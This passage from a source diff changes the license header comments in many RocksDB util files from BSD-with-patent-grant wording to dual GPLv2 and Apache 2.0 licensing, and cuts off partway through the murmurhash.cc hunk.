+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/coding_test.cc b/util/coding_test.cc
index e069b5a28bd..49fb73d4ab0 100644
--- a/util/coding_test.cc
+++ b/util/coding_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/compaction_job_stats_impl.cc b/util/compaction_job_stats_impl.cc
index 148c17639dd..1787e839f8e 100644
--- a/util/compaction_job_stats_impl.cc
+++ b/util/compaction_job_stats_impl.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/compaction_job_stats.h"
diff --git a/util/comparator.cc b/util/comparator.cc
index c070fd1e4c4..f3148f754f4 100644
--- a/util/comparator.cc
+++ b/util/comparator.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/compression.h b/util/compression.h
index c3c3d79ff7a..468b961fbfd 100644
--- a/util/compression.h
+++ b/util/compression.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/concurrent_arena.cc b/util/concurrent_arena.cc
index a99da1547e6..07fa03cf784 100644
--- a/util/concurrent_arena.cc
+++ b/util/concurrent_arena.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/concurrent_arena.h b/util/concurrent_arena.h
index 395598729a4..a79fb95fe2d 100644
--- a/util/concurrent_arena.h
+++ b/util/concurrent_arena.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/core_local.h b/util/core_local.h
index 4239df62efc..4cc4fd90cbb 100644
--- a/util/core_local.h
+++ b/util/core_local.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/crc32c.cc b/util/crc32c.cc
index b12f2c7bf3d..ae36f82305b 100644
--- a/util/crc32c.cc
+++ b/util/crc32c.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/crc32c.h b/util/crc32c.h
index b7a3d53959a..984852969ac 100644
--- a/util/crc32c.h
+++ b/util/crc32c.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/crc32c_test.cc b/util/crc32c_test.cc
index 9bf9fd3c214..306194e9c1a 100644
--- a/util/crc32c_test.cc
+++ b/util/crc32c_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/delete_scheduler.cc b/util/delete_scheduler.cc
index 8ff979d7d28..93fc166971c 100644
--- a/util/delete_scheduler.cc
+++ b/util/delete_scheduler.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/util/delete_scheduler.h b/util/delete_scheduler.h
index ffc770a2d77..4c07ed67c80 100644
--- a/util/delete_scheduler.h
+++ b/util/delete_scheduler.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/delete_scheduler_test.cc b/util/delete_scheduler_test.cc
index 071ceea9dba..6667289185f 100644
--- a/util/delete_scheduler_test.cc
+++ b/util/delete_scheduler_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef __STDC_FORMAT_MACROS
 #define __STDC_FORMAT_MACROS
diff --git a/util/dynamic_bloom.cc b/util/dynamic_bloom.cc
index bd54ed933eb..7c296cb4db5 100644
--- a/util/dynamic_bloom.cc
+++ b/util/dynamic_bloom.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "dynamic_bloom.h"
diff --git a/util/dynamic_bloom.h b/util/dynamic_bloom.h
index 8756120e9cd..17325dd3905 100644
--- a/util/dynamic_bloom.h
+++ b/util/dynamic_bloom.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/dynamic_bloom_test.cc b/util/dynamic_bloom_test.cc
index bc5f62a2890..f50036b76ae 100644
--- a/util/dynamic_bloom_test.cc
+++ b/util/dynamic_bloom_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef GFLAGS
 #include
diff --git a/util/event_logger.cc b/util/event_logger.cc
index c53c8474021..b488984f350 100644
--- a/util/event_logger.cc
+++ b/util/event_logger.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef __STDC_FORMAT_MACROS
 #define __STDC_FORMAT_MACROS
diff --git a/util/event_logger.h b/util/event_logger.h
index 2197f5a7e86..d88a6a4fe68 100644
--- a/util/event_logger.h
+++ b/util/event_logger.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/event_logger_test.cc b/util/event_logger_test.cc
index 6ee193c73e8..13b639442e6 100644
--- a/util/event_logger_test.cc
+++ b/util/event_logger_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/util/fault_injection_test_env.cc b/util/fault_injection_test_env.cc
index 5dd290c5157..3b3a8b9359e 100644
--- a/util/fault_injection_test_env.cc
+++ b/util/fault_injection_test_env.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright 2014 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/fault_injection_test_env.h b/util/fault_injection_test_env.h
index b21037c320e..5d0ae634456 100644
--- a/util/fault_injection_test_env.h
+++ b/util/fault_injection_test_env.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright 2014 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/file_reader_writer.cc b/util/file_reader_writer.cc
index b578b642a2d..22ab7128781 100644
--- a/util/file_reader_writer.cc
+++ b/util/file_reader_writer.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/file_reader_writer.h b/util/file_reader_writer.h
index 2c524a14a0a..deed73c38df 100644
--- a/util/file_reader_writer.h
+++ b/util/file_reader_writer.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc
index 00a32fc2531..dac5182452b 100644
--- a/util/file_reader_writer_test.cc
+++ b/util/file_reader_writer_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "util/file_reader_writer.h"
 #include
diff --git a/util/file_util.cc b/util/file_util.cc
index 829570d3878..c6323b35b01 100644
--- a/util/file_util.cc
+++ b/util/file_util.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "util/file_util.h"
diff --git a/util/file_util.h b/util/file_util.h
index 24c47298490..e59377ab170 100644
--- a/util/file_util.h
+++ b/util/file_util.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include
diff --git a/util/filelock_test.cc b/util/filelock_test.cc
index 29e043038cc..cb4bd43be4a 100644
--- a/util/filelock_test.cc
+++ b/util/filelock_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "rocksdb/status.h"
 #include "rocksdb/env.h"
diff --git a/util/filename.cc b/util/filename.cc
index dede1ca2063..fa1618e1ff0 100644
--- a/util/filename.cc
+++ b/util/filename.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/filename.h b/util/filename.h
index ceb4aedf9f2..0d4bacf536b 100644
--- a/util/filename.h
+++ b/util/filename.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/filter_policy.cc b/util/filter_policy.cc
index 444b17c52ac..efb9bf4763c 100644
--- a/util/filter_policy.cc
+++ b/util/filter_policy.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/hash.cc b/util/hash.cc
index aaa3070e9ed..a0660c60a42 100644
--- a/util/hash.cc
+++ b/util/hash.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/hash.h b/util/hash.h
index 025c566bf6a..4a13f456440 100644
--- a/util/hash.h
+++ b/util/hash.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/hash_map.h b/util/hash_map.h
index d39f59226fb..7b08fb39936 100644
--- a/util/hash_map.h
+++ b/util/hash_map.h
@@ -1,7 +1,7 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. This
-// source code is licensed under the BSD-style license found in the LICENSE
-// file in the root directory of this source tree. An additional grant of
-// patent rights can be found in the PATENTS file in the same directory.
+// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/util/hash_test.cc b/util/hash_test.cc
index 2f03026310c..959e8cd0f68 100644
--- a/util/hash_test.cc
+++ b/util/hash_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/heap.h b/util/heap.h
index c5a864f17b2..4d5894134f2 100644
--- a/util/heap.h
+++ b/util/heap.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/heap_test.cc b/util/heap_test.cc
index c2008d0aad6..b415615f6fb 100644
--- a/util/heap_test.cc
+++ b/util/heap_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/util/kv_map.h b/util/kv_map.h
index d49207dcd51..784a244aece 100644
--- a/util/kv_map.h
+++ b/util/kv_map.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/util/log_buffer.cc b/util/log_buffer.cc
index bb9bb2d164c..d09e0cb002f 100644
--- a/util/log_buffer.cc
+++ b/util/log_buffer.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "util/log_buffer.h"
diff --git a/util/log_buffer.h b/util/log_buffer.h
index daf8ba6f5b7..e356b93a746 100644
--- a/util/log_buffer.h
+++ b/util/log_buffer.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/log_write_bench.cc b/util/log_write_bench.cc
index c3885a29114..4008e433781 100644
--- a/util/log_write_bench.cc
+++ b/util/log_write_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef GFLAGS
 #include
diff --git a/util/logging.h b/util/logging.h
index 7612f57626c..992e0018d7c 100644
--- a/util/logging.h
+++ b/util/logging.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/memory_usage.h b/util/memory_usage.h
index 93f9990072a..0d8854453a8 100644
--- a/util/memory_usage.h
+++ b/util/memory_usage.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/mpsc.h b/util/mpsc.h
index b81492738c5..7449fd35058 100644
--- a/util/mpsc.h
+++ b/util/mpsc.h
@@ -1,7 +1,7 @@
 // Portions Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Large parts of this file is borrowed from the public domain code below.
 // from https://github.com/mstump/queues
diff --git a/util/murmurhash.cc b/util/murmurhash.cc
index 376b644b4db..334ed898ea1 100644
--- a/util/murmurhash.cc
+++ b/util/murmurhash.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
